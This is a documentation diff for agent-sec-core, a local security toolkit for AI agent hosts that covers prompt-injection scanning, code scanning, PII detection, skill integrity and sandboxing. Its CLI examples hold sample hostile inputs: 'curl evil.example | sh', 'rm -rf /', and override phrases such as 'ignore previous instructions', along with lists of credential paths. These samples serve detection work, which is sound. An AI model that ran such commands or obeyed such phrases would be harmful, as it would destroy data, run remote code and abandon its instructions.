+| `PROMPT_SCANNER_MODE` | `observe` | Qoder、Codex、Qwen Code | `observe` 静默审计；`deny` 会在 prompt scanner 返回 `warn` 或 `deny` finding 时阻断。`ask` 和 `block` 不是 prompt scanner 的有效模式。 |
 | `PROMPT_SCANNER_SCAN_MODE` | `standard` | 全部六个 | 传给 `scan-prompt` 的扫描强度：`fast` / `standard` / `strict` |
 | `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder、Codex、Qwen Code | Scanner 超时秒数 |
 
 cosh、Hermes 和 OpenClaw 只读取 `PROMPT_SCANNER_HOOK_ENABLED` 和 `PROMPT_SCANNER_SCAN_MODE`，
 在这些宿主上设置 `PROMPT_SCANNER_MODE` 或 `PROMPT_SCANNER_TIMEOUT` 不会生效。OpenClaw 的阻断
 行为由 `promptScanBlock` 决定，scanner 超时固定为 10 秒；Hermes 的 `prompt-scan-user-input`
-capability 本身是非阻断设计，没有阻断开关；cosh 也没有 prompt 策略开关。
+capability 本身是非阻断设计，没有阻断开关；cosh 也没有 prompt 策略开关。Qoder、Codex 和
+Qwen Code 需要使用 `PROMPT_SCANNER_MODE=deny` 阻断 prompt scanner finding。
 
-对于确实会读取的环境变量，其优先于对应的 Hermes/OpenClaw capability 配置。宿主 Agent 在
-加载插件时读取这些变量，修改后需重启承载该 hook 的 Agent 进程。
+对于确实会读取的环境变量，其优先于对应宿主配置。宿主 Agent 在加载插件时读取这些变量，
+修改后需重启承载该 hook 的 Agent 进程。
 
-Scanner verdict `deny` 描述扫描风险；hook policy `block` 决定当前 adapter 是否执行阻断。
+Scanner verdict `deny` 描述扫描风险。对于 Qoder、Codex 和 Qwen Code prompt hook，
+`PROMPT_SCANNER_MODE=deny` 是将 prompt scanner finding 转成阻断 hook 结果的部署策略。
 
 ## Security Event 与 Observability
 

--- a/src/agent-sec-core/AGENTS.md
+++ b/src/agent-sec-core/AGENTS.md
@@ -493,7 +493,7 @@ Do NOT write guidelines from design intent or mental models. Write them AFTER ve
 - Eight modules in overview table (Sandbox is architecture-only, no dedicated usage section). Seven usage sections: Prompt Scanner, Code Scanner, Skill Ledger, PII Checker, Security Baseline, Observability, Security Events. Do not merge them.
 - Agent integration order in docs: CLI (always available) → OpenClaw plugin → Hermes plugin → cosh hook (auto-loaded, no user action needed). This reflects manual-effort-first ordering.
 - `loongshield` may be mentioned alongside `agent-sec-cli harden` — loongshield is an Alinux system component users already know; `agent-sec-cli harden` is ANOLISA's unified entry point wrapping it.
-- ML model warmup: state that models come from ModelScope (Llama-Prompt-Guard-2-86M). Never reference internal model registries.
+- ML model preparation: state that L2 uses ModelScope model `modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF`; operators must run `ollama pull` first, and `scan-prompt warmup` only verifies availability. Never reference internal model registries.
 
 ### Gotchas to Warn About
 - Code Scanner verdict enum defines `pass` / `warn` / `deny` / `error`. Built-in rules currently produce `warn` or `pass`; `deny` and `error` are available for custom/LLM-driven rules. Do not invent levels outside this enum (no "critical", no "info").

--- a/src/agent-sec-core/README.md
+++ b/src/agent-sec-core/README.md
@@ -133,9 +133,10 @@ whitespace). An unset or invalid value keeps the hook enabled. Restart the host
 after changing it.
 
 `OBSERVABILITY_TIMEOUT` sets the timeout in seconds for each local PII
-redaction and observability record CLI call. It defaults to `5`; an unset,
-empty, invalid, or non-positive value also uses `5`. Every integration caps
-larger values at `5`.
+redaction and observability record CLI call. The five non-Hermes integrations
+default to `5` and use `5` for an unset, empty, invalid, or non-positive value.
+Hermes instead falls back to its observability capability `timeout`, bounded to
+at most `5`. Every integration caps a valid environment value above `5` at `5`.
 
 For OpenClaw and Hermes, the existing observability capability `enabled` setting
 remains an independent gate. Either switch can disable recording; setting this

--- a/src/agent-sec-core/README.md
+++ b/src/agent-sec-core/README.md
@@ -2,7 +2,12 @@
 
 [中文版](README_zh.md)
 
-**OS-level security kernel for AI Agents.** Provides a full defense chain of system hardening, asset integrity verification, and security decision-making. Runs as a security supervision layer above all business skills, applicable to Agent OS platforms such as [ANOLISA](../../README.md) and OpenClaw.
+**OS-level security kernel for AI Agents.** Provides defense in depth for Agent
+workloads: prompt injection detection, code scanning, PII detection, skill
+integrity tracking, system baseline hardening, sandbox isolation, and a local
+security event store. Everything runs locally with no Token cost. Applicable to
+Agent OS platforms such as [ANOLISA](../../README.md) and to the six Agent hosts
+listed below.
 
 ## Background
 
@@ -13,126 +18,105 @@ As AI Agents gradually gain OS-level execution capabilities (file I/O, network a
 1. **Least Privilege** — Agents receive only the minimum system permissions required to complete a task.
 2. **Explicit Authorization** — Sensitive operations require explicit user confirmation; silent privilege escalation is forbidden.
 3. **Zero Trust** — Skills are mutually untrusted; each operation is independently authenticated.
-4. **Defense in Depth** — System hardening → Asset verification → Security decision. Compromise of any single layer does not affect the others.
+4. **Defense in Depth** — Pre-execution prevention → runtime detection → kernel-level containment. Compromise of any single layer does not affect the others.
 5. **Security Over Execution** — When security and functionality conflict, security wins. When in doubt, treat as high risk.
+
+## Capabilities
+
+| Module | Description | CLI entry |
+|--------|-------------|-----------|
+| **Prompt Scanner** | Prompt injection / jailbreak detection: rule engine (L1) + ML classifier (L2), plus multi-turn intent detection (L4) | `agent-sec-cli scan-prompt` |
+| **Code Scanner** | Static analysis of bash / python code for dangerous operations | `agent-sec-cli scan-code` |
+| **PII Checker** | Personal data and credential detection with redaction | `agent-sec-cli scan-pii` |
+| **Skill Ledger** | Ed25519-signed skill integrity ledger with an append-only version chain | `agent-sec-cli skill-ledger` |
+| **Security Baseline** | System hardening scan and remediation (wraps `loongshield seharden`) | `agent-sec-cli harden` |
+| **Observability** | Agent lifecycle event recording, session debrief, and an interactive review TUI | `agent-sec-cli observability` |
+| **Security Events** | Local JSONL + SQLite event store with query and aggregation | `agent-sec-cli events` |
+| **Sandbox** | Syscall-level command isolation (bubblewrap + seccomp), used as an architecture layer | `linux-sandbox` |
+
+The background daemon (`agent-sec-daemon`, shipped as the `agent-sec-core.service`
+systemd **user** unit) provides health, SkillFS notification, and security-query
+RPCs. Prompt scanning runs in-process through the Rust extension; the daemon does
+not preload Prompt Scanner models or serve scan RPCs.
 
 ## Security Architecture
 
 ```
-┌─────────────────────────────────────────────┐
-│              Agent Application              │
-├──────────────────┬──────────────────────────┤
-│ Security Check   │  Sandbox Policy          │
-│ Workflow         │  (managed independently  │
-│ (agent-sec-cli)  │   by agent-sec-cli)      │
-├──────────────────┴──────────────────────────┤
-│  4. Security Decision (Risk Classification) │
-├─────────────────────────────────────────────┤
-│  Phase 3: Final Security Confirmation       │
-├─────────────────────────────────────────────┤
-│  Phase 2: Asset Protection (GPG + SHA-256)  │
-├─────────────────────────────────────────────┤
-│  Phase 1: System Hardening (loongshield)    │
-├─────────────────────────────────────────────┤
-│              Linux Kernel                   │
-└─────────────────────────────────────────────┘
+┌─────────────────────────────────────────────────────────┐
+│   Agent hosts: cosh · OpenClaw · Hermes ·               │
+│                Qwen Code · Qoder · Codex                │
+├─────────────────────────────────────────────────────────┤
+│   Hooks (per host): code-scanner · prompt-scanner ·     │
+│           pii-checker · skill-ledger · observability    │
+├──────────────────────────┬──────────────────────────────┤
+│  agent-sec-cli           │  agent-sec-daemon            │
+│  scan-prompt / scan-code │  health + SkillFS notify     │
+│  scan-pii / skill-ledger │  security query RPC          │
+│  harden / verify         │                              │
+│  events / observability  │                              │
+├──────────────────────────┴──────────────────────────────┤
+│  Security Events (JSONL + SQLite)                       │
+├─────────────────────────────────────────────────────────┤
+│  linux-sandbox (bubblewrap + seccomp)                   │
+├─────────────────────────────────────────────────────────┤
+│  Linux Kernel · loongshield baseline                    │
+└─────────────────────────────────────────────────────────┘
 ```
-
-The security check workflow (Phase 1-3 + Security Decision) is provided by `agent-sec-cli`; each phase is invoked through dedicated CLI subcommands.
-
-## Security Check Workflow
-
-Before each Agent execution, complete the following security checks **in strict order** (Phase 1-3). Only after all phases pass can the security decision process proceed.
-
-| Phase | Description | Entry | PASS Condition |
-|-------|-------------|-------|----------------|
-| **Phase 1** | System Hardening — `loongshield seharden --scan --config agentos_baseline` | `agent-sec-cli harden --scan` | Output contains `结果：合规` |
-| **Phase 2** | Asset Protection — GPG signature + SHA-256 hash verification of all skills | `agent-sec-cli verify` | Output contains `VERIFICATION PASSED` |
-| **Phase 3** | Final Confirmation — Re-run Phase 1 scan + Phase 2 verify as recheck | Re-invoke the commands above | Both rechecks pass |
-
-If any phase is not PASS, all subsequent phases are cancelled and the agent execution is blocked.
-
-## Risk Classification
-
-| Level | Examples | Action |
-|-------|----------|--------|
-| **Low** | File reads, info queries, text processing | Allow (sandboxed) |
-| **Medium** | Code execution, package install, external API calls | Sandbox isolation + user confirmation |
-| **High** | Reading `.env` / SSH keys, data exfiltration, modifying system config | Block unless explicitly approved |
-| **Critical** | Prompt injection, secret leakage, disabling security policies | Immediate block + audit log + notify user |
-
-**When in doubt, treat as high risk.**
-
-## Protected Assets
-
-### System Credentials
-
-Agents are **never** allowed to access or exfiltrate:
-
-- SSH keys (`/etc/ssh/`, `~/.ssh/`)
-- GPG private keys
-- API tokens / OAuth credentials
-- Database credentials
-- `/etc/shadow`, `/etc/gshadow`
-- Host identity information (IP, MAC, `hostname`)
-
-### Critical System Files
-
-The following paths are write-protected:
-
-- `/etc/passwd`, `/etc/shadow`, `/etc/sudoers`
-- `/etc/ssh/sshd_config`, `/etc/pam.d/`, `/etc/security/`
-- `/etc/sysctl.conf`, `/etc/sysctl.d/`
-- `/boot/`, `/usr/lib/systemd/`, `/etc/systemd/system/`
-
-## Sandbox Policy Templates
-
-`linux-sandbox` provides 3 built-in policy templates:
-
-| Template | Filesystem | Network | Use Case |
-|----------|-----------|---------|----------|
-| **read-only** | Entire filesystem read-only | Denied | Read-only operations: `ls`, `cat`, `grep`, `git status`, etc. |
-| **workspace-write** | cwd + /tmp writable, rest read-only | Denied | Build, edit, script execution requiring file writes |
-| **danger-full-access** | Unrestricted | Allowed | ⚠ Reserved template, for special scenarios only |
-
-Command classification maps directly to sandbox modes:
-
-| Classification | Sandbox Mode | Description |
-|---------------|-------------|-------------|
-| `destructive` | ❌ Rejected | Dangerous commands, execution refused |
-| `dangerous` | workspace-write | High-risk operations, no extra permissions allowed |
-| `safe` | read-only | Read-only operations, no extra permissions needed |
-| `default` | workspace-write | Normal operations, network/write paths added as needed |
 
 ## Project Structure
 
 ```
 agent-sec-core/
 ├── linux-sandbox/             # Rust sandbox executor (bubblewrap + seccomp)
-│   ├── src/                   # Rust source (cli, policy, seccomp, proxy, …)
-│   ├── tests/                 # Rust integration tests + Python e2e
+│   ├── src/                   # Rust source (cli, policy, seccomp, bwrap_args, …)
+│   ├── tests/                 # Rust integration tests
 │   └── docs/                  # dev-guide, user-guide
-├── agent-sec-cli/             # Unified CLI + security middleware (Python)
+├── agent-sec-cli/             # Unified CLI + security middleware (Python + Rust ext)
 │   ├── src/agent_sec_cli/     # Main Python package
 │   │   ├── cli.py             # CLI entry point (Typer)
-│   │   ├── asset_verify/      # Skill signature + hash verification
-│   │   ├── code_scanner/      # Code security scanning engine
-│   │   ├── sandbox/           # Sandbox policy generation
-│   │   ├── skill_ledger/      # Ed25519 integrity ledger (check/certify/status)
-│   │   ├── security_events/   # JSONL event logging
-│   │   └── security_middleware/ # Middleware layer + backends
+│   │   ├── asset_verify/      # Skill GPG signature + hash verification
+│   │   ├── code_scanner/      # Code scanning engine (regex + llm) and rules
+│   │   ├── prompt_scanner/    # Prompt injection / jailbreak scanner
+│   │   ├── pii_checker/       # PII and credential detection
+│   │   ├── skill_ledger/      # Ed25519 integrity ledger and built-in scanners
+│   │   ├── sandbox/           # Command classification + sandbox policy generation
+│   │   ├── observability/     # Observability records, report, review TUI
+│   │   ├── security_events/   # JSONL + SQLite event store
+│   │   ├── security_middleware/ # Middleware layer + backends
+│   │   ├── daemon/            # agent-sec-daemon server and client
+│   │   ├── model_service/     # Local model backends (e.g. Ollama)
+│   │   └── telemetry/         # Telemetry schema + writer
 │   ├── dev-tools/             # Developer guides for extending backends
 │   └── pyproject.toml         # Build configuration
-├── qwen-code-extension/       # Qwen Code PII policy + Observability hooks
-├── skills/                    # Security-related skills (skill-ledger, code-scanner, prompt-scanner, ...)
+├── cosh-extension/            # Copilot Shell hooks + sandbox guard
+├── openclaw-plugin/           # OpenClaw plugin (TypeScript)
+├── hermes-plugin/             # Hermes plugin (Python capabilities)
+├── qwen-code-extension/       # Qwen Code hooks
+├── qoder-plugin/              # Qoder CLI hooks
+├── codex-plugin/              # Codex hooks
+├── skills/                    # Security skills: code-scanner, prompt-scanner, skill-ledger
 ├── tools/                     # sign-skill.sh — PGP skill signing utility
-├── tests/                     # Unit, integration, and e2e tests
+├── packaging/                 # raw package build + systemd unit template
+├── scripts/                   # CLI/daemon wrappers and CI helpers
+├── docs/design/               # Design documents
+├── tests/                     # Unit, integration, packaging, and e2e tests
+├── .anolisa/component.toml    # ANOLISA component contract
 ├── LICENSE
 ├── Makefile
-├── agent-sec-core.spec        # RPM packaging spec
+├── agent-sec-core.spec.in     # RPM packaging spec template
 ├── README.md
 └── README_zh.md
 ```
+
+Each of the six Agent hosts ships all five hook types (code-scanner,
+prompt-scanner, pii-checker, skill-ledger, observability); the enforcement modes
+each host supports differ — see [Agent Hook Environment Variables](#agent-hook-environment-variables).
+
+Adapter-specific notes:
+[OpenClaw](openclaw-plugin/README.md) ·
+[Hermes](hermes-plugin/README.md) ·
+[Codex](codex-plugin/README.md) ·
+[Qwen Code](qwen-code-extension/README.md)
 
 ## Observability Hook Configuration
 
@@ -164,11 +148,13 @@ variable to `true` does not re-enable a capability disabled in plugin configurat
 | Component | Requirement |
 |-----------|-------------|
 | **OS** | Alibaba Cloud Linux / Anolis / RHEL family |
-| **Permissions** | root or sudo |
-| **loongshield** | >= 1.1.1 (Phase 1 system hardening) |
-| **gpg / gnupg2** | >= 2.0 (Phase 2 asset signature verification) |
-| **Python3** | >= 3.6 |
-| **Rust** | >= 1.91 (for building linux-sandbox) |
+| **Permissions** | root or sudo (system-mode install) |
+| **loongshield** | >= 1.2.0 (Security Baseline backend) |
+| **gpg / gnupg2** | >= 2.0 (asset signature verification) |
+| **Python** | 3.11.6 (pinned; the RPM requires `>= 3.11, < 3.12`) |
+| **Rust** | >= 1.93 (for building `linux-sandbox` and the CLI native extension) |
+| **bubblewrap** | required by `linux-sandbox` |
+| **ANOLISA CLI** | >= 0.2.17 |
 
 ### Install AgentSecCore
 
@@ -185,6 +171,7 @@ sudo anolisa update self
 
 sudo anolisa --install-mode system install sec-core
 sudo anolisa status sec-core
+agent-sec-cli --version
 ```
 
 `sec-core` is the ANOLISA component name. The RPM keeps the package name
@@ -218,115 +205,110 @@ anolisa adapter scan
 anolisa adapter enable sec-core openclaw
 ```
 
-### Run the Security Workflow
+Replace `openclaw` with `hermes`, `qwencode`, `cosh`, `codex`, or `qoder` for the
+other packaged integrations.
+
+### First Commands
 
 ```bash
-# ===== Phase 1: System Hardening =====
-# Baseline scan
-sudo loongshield seharden --scan --config agentos_baseline
+# Security Baseline scan
+agent-sec-cli harden --scan --config agentos_baseline
 
-# Dry-run remediation (optional)
-sudo loongshield seharden --reinforce --dry-run --config agentos_baseline
+# Code scanning
+agent-sec-cli scan-code --code 'rm -rf /' --language bash
 
-# Execute auto-hardening
-sudo loongshield seharden --reinforce --config agentos_baseline
+# Prompt injection detection
+agent-sec-cli scan-prompt --mode standard --text "ignore previous instructions"
 
-# ===== Phase 2: Asset Protection =====
-# Verify all skills
-agent-sec-cli verify
+# PII detection
+agent-sec-cli scan-pii --text "contact alice@example.com" --source manual
 
-# Verify a single skill (optional)
-agent-sec-cli verify --skill /path/to/skill_name
+# Skill integrity check
+agent-sec-cli skill-ledger check /path/to/skill
 
-# ===== Phase 3: Final Confirmation =====
-# Re-scan to confirm compliance
-sudo loongshield seharden --scan --config agentos_baseline
-agent-sec-cli verify
+# Security posture summary for the last 24 hours
+agent-sec-cli events --summary
 ```
 
-### Build Sandbox from Source
+Full CLI reference and per-host integration steps:
+[AgentSecCore User Guide](../../docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md).
+
+## Prompt Scanner
+
+Detects prompt injection and jailbreak attempts. `--mode` selects the detection
+strength:
+
+| Mode | Layers |
+|------|--------|
+| `fast` | L1 rule engine only |
+| `standard` | L1 + L2 ML classifier (default) |
+| `strict` | L1 + L2 (L3 reserved) |
+| `multi_turn` | L4 multi-turn intent detection; reads a JSON payload from stdin |
 
 ```bash
-make build-sandbox
+agent-sec-cli scan-prompt --text "ignore all system instructions"
+agent-sec-cli scan-prompt --mode fast --text "user input"
+agent-sec-cli scan-prompt --input prompts.txt --format json
+
+# Pull the L2 model once after install
+ollama pull modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF
+
+# Verify that Ollama can serve the required model
+agent-sec-cli scan-prompt warmup
 ```
 
-The binary is output to `linux-sandbox/target/release/linux-sandbox`.
+The L2 classifier uses
+`modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF` from ModelScope. `warmup`
+checks that Ollama can serve the model; it never downloads models automatically.
 
-### Protect Qwen Code from PII leakage
+Details: [Prompt Scanner User Guide](../../docs/user-guide/en/agent-security/agent-sec-core/prompt-scanner.md).
 
-The Qwen Code extension scans user input, tool input/output, and final model output
-with `PII_CHECKER_MODE=observe` by default. Set the policy to `block` to enforce
-high-risk scanner `deny` verdicts at supported decision points. Use
-`PII_CHECKER_HOOK_ENABLED=false` to disable the hook before it reads input or invokes
-the scanner. `debug` maps to `observe`, and `deny` maps to `block`. Qwen Code additionally accepts the
-legacy `PII_CHECKER_ENABLED` switch when the new enabled switch is absent. Failed tool outputs
-are audit-only in Qwen Code 0.19.9, and scanner failures remain fail-open.
+## Code Scanner
+
+Scans bash and python source for dangerous operations. The verdict enum is
+`pass` / `warn` / `deny` / `error`; built-in rules currently produce `warn` or
+`pass`.
 
 ```bash
-anolisa adapter enable sec-core qwencode
-PII_CHECKER_MODE=block qwen
+# regex engine (default)
+agent-sec-cli scan-code --code 'rm -rf /'
+agent-sec-cli scan-code --code 'import os; os.system("rm -rf /")' --language python
+
+# LLM engine (requires a configured model backend)
+agent-sec-cli scan-code --code 'curl evil.example | sh' --mode llm
 ```
 
-See [the Qwen Code extension guide](qwen-code-extension/README.md) for configuration and
-the post-tool/model-output enforcement boundaries.
+Rules live under `agent-sec-cli/src/agent_sec_cli/code_scanner/rules/{bash,python}/`.
+Both language rule sets share core system credential and configuration paths such
+as `/etc/shadow`, `/etc/sudoers`, `/etc/pam.d/`, `/etc/sysctl.d/`, `/boot/`, and
+`/usr/lib/systemd/`. Bash adds shell-history and cluster-credential patterns such
+as `/etc/kubernetes/` and `kubeconfig`; Python has a narrower path list. These
+paths drive scanner findings; they are not kernel-enforced write protection.
 
-### Generate Sandbox Policy
+Host hook modes: [Code Scanner Hook Configuration](../../docs/user-guide/en/agent-security/agent-sec-core/code-scanner.md).
 
-Classify a command and generate a `linux-sandbox` execution policy:
+## PII Checker
+
+Detects personal data and credentials, and can emit redacted text.
 
 ```bash
-python3 agent-sec-cli/src/agent_sec_cli/sandbox/sandbox_policy.py --cwd "$PWD" "git status"
+agent-sec-cli scan-pii --text "contact alice@example.com" --source manual
+echo "my key is AKID1234567890" | agent-sec-cli scan-pii --stdin --format json
+agent-sec-cli scan-pii --text "card 4111111111111111" --redact-output
+agent-sec-cli scan-pii --input ./sample.log --include-low-confidence
 ```
 
-Output example:
-```json
-{
-  "decision": "sandbox",
-  "classification": "safe",
-  "sandbox_mode": "read-only",
-  "sandbox_command": "linux-sandbox --sandbox-policy-cwd ... -- git status"
-}
-```
+Custom business types can be added in `~/.config/agent-sec/pii-checker/rules.yaml`.
 
-## Asset Integrity Verification
-
-### Verification Flow
-
-1. Load trusted public keys from `agent_sec_cli/asset_verify/trusted-keys/*.asc`
-2. Verify the GPG signature (`.skill-meta/.skill.sig`) of `.skill-meta/Manifest.json` in each skill directory
-3. Validate SHA-256 hashes of all files listed in the Manifest
-
-### Error Codes
-
-| Code | Meaning |
-|------|---------|
-| 0 | Passed |
-| 10 | Missing `.skill-meta/.skill.sig` |
-| 11 | Missing `.skill-meta/Manifest.json` |
-| 12 | Invalid signature |
-| 13 | Hash mismatch |
-
-### Sign Skills (Self-Deployment Quick Start)
-
-When deploying from source, skills are unsigned by default. Sign them so Phase 2 passes:
-
-```bash
-# 1. One-time: generate GPG key + export public key
-tools/sign-skill.sh --init
-
-# 2. Batch-sign all skills
-tools/sign-skill.sh --batch /usr/share/anolisa/skills --force
-
-# 3. Verify
-agent-sec-cli verify
-```
-
-For the complete guide (manual key management, custom skills, CI/CD, troubleshooting), see **[Skill Signing Guide](tools/SIGNING_GUIDE.md)**.
+Details: [PII Checker User Guide](../../docs/user-guide/en/agent-security/agent-sec-core/pii-checker.md).
 
 ## Skill Ledger
 
 Ed25519-based integrity ledger for skill directories. Tracks file hashes, version chains, and scan results in `.skill-meta/` manifests — all managed via the `agent-sec-cli skill-ledger` subcommand.
 For an existing manifest, authenticity is verified before file drift; an unsigned existing manifest is reported as `tampered`.
+
+The six integrity states are `pass` / `none` / `drifted` / `warn` / `deny` /
+`tampered`.
 
 ### Key Commands
 
@@ -338,8 +320,9 @@ For an existing manifest, authenticity is verified before file drift; an unsigne
 | `check <dir>` | Detect drift / tampering against the manifest |
 | `show <dir>` | Show latest/active exposure summary, user decision, warnings, and findings |
 | `export <dir> --version latest --output <path>` | Export a signed snapshot, manifest, and findings for review |
-| `decide <dir> --action allow|always_allow|block|rollback` | Record a user decision and refresh activation |
+| `decide <dir> --action allow\|always_allow\|block\|rollback` | Record a user decision and refresh activation |
 | `certify <dir> --findings <file>` | Import external scanner findings and sign the manifest |
+| `list-scanners` | List registered built-in scanners |
 | `status` | System-wide health overview (keys, config, aggregate integrity) |
 | `audit <dir>` | Show version history and signature chain |
 | `check --all` / `scan --all` | Batch mode across all registered skill dirs |
@@ -429,28 +412,83 @@ For `observability`, the view applies `OBSERVABILITY_TIMEOUT` consistently acros
 
 Table output is limited to `CAPABILITY`, `ENABLED`, `MODE`, `SCAN_MODE`, `TIMEOUT(s)`, and `DIAGNOSTICS`. JSON output keeps the same user-facing fields and sanitized `env` entries containing only `effective` and `default` values. Neither output format exposes hook matcher lists, source labels, Agent config contents, config paths, or raw environment variable values. Diagnostics identify the invalid setting and fallback behavior without echoing the original value.
 
-## Audit Log
+## Security Baseline
 
-All security events are logged as JSONL to `/var/log/agent-sec/security-events.jsonl` (falls back to `~/.agent-sec-core/security-events.jsonl`):
+`agent-sec-cli harden` wraps `loongshield seharden` and defaults to
+`--scan --config agentos_baseline` when no action or profile is given.
 
-```json
-{"event_id": "uuid", "event_type": "harden", "category": "hardening", "timestamp": "ISO-8601", "trace_id": "uuid", "pid": 1234, "uid": 0, "details": {"request": {...}, "result": {...}}}
+```bash
+# Compliance scan
+agent-sec-cli harden --scan --config agentos_baseline
+
+# Preview remediation
+agent-sec-cli harden --reinforce --dry-run --config agentos_baseline
+
+# Execute remediation (requires root)
+sudo agent-sec-cli harden --reinforce --config agentos_baseline
+
+# Full downstream loongshield help
+agent-sec-cli harden --downstream-help
 ```
+
+## Observability
+
+```bash
+# Interactive drill-down TUI (requires an interactive terminal)
+agent-sec-cli observability review
+
+# Per-session debrief report
+agent-sec-cli observability report --last
+agent-sec-cli observability report --session-id <id> --format json
+
+# Public observability record JSON Schema
+agent-sec-cli observability schema
+```
+
+Details: [Observability User Guide](../../docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md#observability).
+
+## Security Events
+
+Security events are written both as JSONL and into a SQLite store. Query the store
+with `agent-sec-cli events`:
+
+```bash
+agent-sec-cli events --last-hours 24
+agent-sec-cli events --category prompt_scan --output json
+agent-sec-cli events --count-by category --last-hours 24
+agent-sec-cli events --summary
+```
+
+Details: [Security Events User Guide](../../docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md#security-events).
+
+## Agent Hook Environment Variables
+
+The host hook matrix is maintained in the user guide to keep one authoritative
+source for environment variables and host-specific mode semantics:
+[Agent Hook Environment Variables](../../docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md#agent-hook-environment-variables).
 
 ## Development
 
 ```bash
-# Build sandbox
+# Build everything (sandbox, CLI wheel, all adapters, skills, component manifest)
+make build-all
+
+# Individual targets
 make build-sandbox
+make build-cli
 
-# Run Rust tests
-cd linux-sandbox && cargo test
+# Tests
+make test               # Python + Rust sandbox + OpenClaw plugin
+make test-python
+make test-rust
+make test-openclaw-plugin
 
-# Run e2e tests (requires sandbox installed)
-python3 tests/e2e/linux-sandbox/e2e_test.py
-
-# Format Python code
+# Lint and formatting
+make python-lint
 make python-code-pretty
+
+# List all targets
+make help
 ```
 
 ## License

--- a/src/agent-sec-core/README_zh.md
+++ b/src/agent-sec-core/README_zh.md
@@ -128,8 +128,9 @@ export OBSERVABILITY_HOOK_ENABLED=false
 修改后需重启对应宿主进程。
 
 `OBSERVABILITY_TIMEOUT` 控制每次本地 PII 脱敏和 Observability 数据写入 CLI 调用的超时秒数。
-默认值为 `5`；未设置、空值、非法值或非正数同样使用 `5`。所有集成都会将大于 `5` 的值
-封顶为 `5`。
+其余五个非 Hermes 集成默认使用 `5`；未设置、为空、非法或非正数时也使用 `5`。
+Hermes 则回退到 Observability capability 的 `timeout`，并将其封顶为 `5`；有效环境变量
+大于 `5` 时，所有集成都封顶为 `5`。
 
 对于 OpenClaw 和 Hermes，原有 Observability capability 的 `enabled` 配置仍是独立开关。
 任一开关关闭都会停止记录；将该环境变量设为 `true`，不会重新启用已在插件配置中关闭的

--- a/src/agent-sec-core/README_zh.md
+++ b/src/agent-sec-core/README_zh.md
@@ -2,7 +2,10 @@
 
 [English](README.md)
 
-**面向 AI Agent 的 OS 级安全内核。** 提供系统加固、资产完整性校验与安全决策的完整防护链，作为所有业务 skill 之上的安全监督层运行，适用于 [ANOLISA](../../README_zh.md)、OpenClaw 等 AI Agent 运行平台。
+**面向 AI Agent 的 OS 级安全内核。** 为 Agent 负载提供纵深防御：提示词注入检测、
+代码扫描、PII 检测、Skill 完整性追踪、系统基线加固、沙箱隔离，以及本地安全事件
+存储。全部本地运行，无 Token 消耗。适用于 [ANOLISA](../../README_zh.md) 等 AI Agent
+运行平台，以及下文列出的六个 Agent 宿主。
 
 ## 背景
 
@@ -13,126 +16,104 @@
 1. **最小权限** — Agent 仅获得完成任务所需的最小系统权限。
 2. **显式授权** — 敏感操作必须经过用户明确确认，禁止静默提权。
 3. **零信任** — Skill 间互不信任，每次操作独立鉴权。
-4. **纵深防御** — 系统加固 → 资产校验 → 安全决策，任一层失守不影响其他层。
+4. **纵深防御** — 执行前预防 → 运行时检测 → 内核级隔离，任一层失守不影响其他层。
 5. **安全优先于执行** — 当安全与功能冲突时，安全优先；存疑时按高风险处理。
+
+## 能力总览
+
+| 模块 | 说明 | CLI 入口 |
+|------|------|----------|
+| **Prompt Scanner** | 提示词注入 / 越狱检测：规则引擎（L1）+ ML 分类器（L2），以及多轮意图检测（L4） | `agent-sec-cli scan-prompt` |
+| **Code Scanner** | 对 bash / python 代码做静态危险操作分析 | `agent-sec-cli scan-code` |
+| **PII Checker** | 个人数据与凭证检测，支持脱敏输出 | `agent-sec-cli scan-pii` |
+| **Skill Ledger** | 基于 Ed25519 签名的 Skill 完整性账本，仅追加版本链 | `agent-sec-cli skill-ledger` |
+| **Security Baseline** | 系统加固扫描与修复（封装 `loongshield seharden`） | `agent-sec-cli harden` |
+| **Observability** | Agent 生命周期事件记录、会话复盘报告、交互式审查 TUI | `agent-sec-cli observability` |
+| **Security Events** | 本地 JSONL + SQLite 事件存储，支持查询与聚合 | `agent-sec-cli events` |
+| **Sandbox** | 系统调用级命令隔离（bubblewrap + seccomp），作为架构层使用 | `linux-sandbox` |
+
+后台守护进程 `agent-sec-daemon`（以 `agent-sec-core.service` systemd **user** unit
+形式发布）提供健康检查、SkillFS 通知和安全查询 RPC。Prompt Scanner 通过 Rust 扩展
+在进程内执行；daemon 不会预加载 Prompt Scanner 模型，也不提供扫描 RPC。
 
 ## 安全防护架构
 
 ```
-┌─────────────────────────────────────────────┐
-│              Agent Application              │
-├──────────────────┬──────────────────────────┤
-│ 安全检查工作流     │  沙箱策略                 │
-│ (agent-sec-cli)  │  (由 agent-sec-cli        │
-│                  │   独立管理)               │
-├──────────────────┴──────────────────────────┤
-│  4. 安全决策流程（风险分级与处置）          │
-├─────────────────────────────────────────────┤
-│  Phase 3: 最终安全确认                       │
-├─────────────────────────────────────────────┤
-│  Phase 2: 关键资产保护 (GPG + SHA-256)       │
-├─────────────────────────────────────────────┤
-│  Phase 1: 系统安全加固 (loongshield)         │
-├─────────────────────────────────────────────┤
-│              Linux Kernel                   │
-└─────────────────────────────────────────────┘
+┌─────────────────────────────────────────────────────────┐
+│   Agent 宿主：cosh · OpenClaw · Hermes ·                 │
+│               Qwen Code · Qoder · Codex                 │
+├─────────────────────────────────────────────────────────┤
+│   各宿主 Hook：code-scanner · prompt-scanner ·           │
+│           pii-checker · skill-ledger · observability     │
+├──────────────────────────┬──────────────────────────────┤
+│  agent-sec-cli           │  agent-sec-daemon            │
+│  scan-prompt / scan-code │  健康检查 + SkillFS 通知      │
+│  scan-pii / skill-ledger │  安全查询 RPC                 │
+│  harden / verify         │                              │
+│  events / observability  │                              │
+├──────────────────────────┴──────────────────────────────┤
+│  Security Events（JSONL + SQLite）                       │
+├─────────────────────────────────────────────────────────┤
+│  linux-sandbox（bubblewrap + seccomp）                   │
+├─────────────────────────────────────────────────────────┤
+│  Linux Kernel · loongshield 基线                         │
+└─────────────────────────────────────────────────────────┘
 ```
-
